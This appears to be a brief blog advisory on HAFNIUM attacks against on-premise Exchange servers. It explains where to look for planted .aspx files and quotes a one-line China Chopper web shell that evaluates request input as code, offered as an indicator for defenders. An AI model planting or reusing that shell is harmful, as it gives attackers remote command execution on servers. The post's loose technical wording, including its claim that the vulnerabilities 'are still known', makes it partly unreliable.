Microsoft Exchange HAFNIUM
How companies with on-premise Exchange server are been hacked
The Microsoft Threat Intelligence Center announced a security threat targeting companies using on-premise Microsoft exchange servers. Over the past two months, HAFNIUM hacked as many as 30,000 organizations, doubling to over 60,000 total as of last weekend. This resulted in Microsoft going public to speak about the attack in the hope of finding a solution.
The vulnerabilities causing the problem are still known, but we have some information on how to know if your system has been compromised.
According on Chris Krebs , if you’re running OWA server exposed to the internet, you should check for the presence eight character apsx files in: C:\\inetpub\wwwroot\aspnet_client\system_web\
Basically, the attacker is gaining access to the server using a web-Shell, which is why antivirus software can’t detect the attacks. the presence of web files inside web server folders doesn't seems much of deterrent for anyone.Keep in mind, however, it’s the content of the files that’s dangerous.
Here is an example of the shells that you can look for if you suspect anything:
http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“NO9BxmCXw0JE”],”unsafe”);}</script>
This is what has been found inside those web shells, which is something was found back in 2013 and given the name ‘China Chopper web shell.’ For those who are interested, here is the article that explain how those web shells works:
So, the hacker can then take command execution on the server, which bring us to the point of 0-day exploit- meaning it’s undiscovered vulnerability yet.
We’re including a link to this GitHub project so you can scan your servers for any unwanted web shells. The project is updated frequently, so please keep scanning your system if you’re worried:
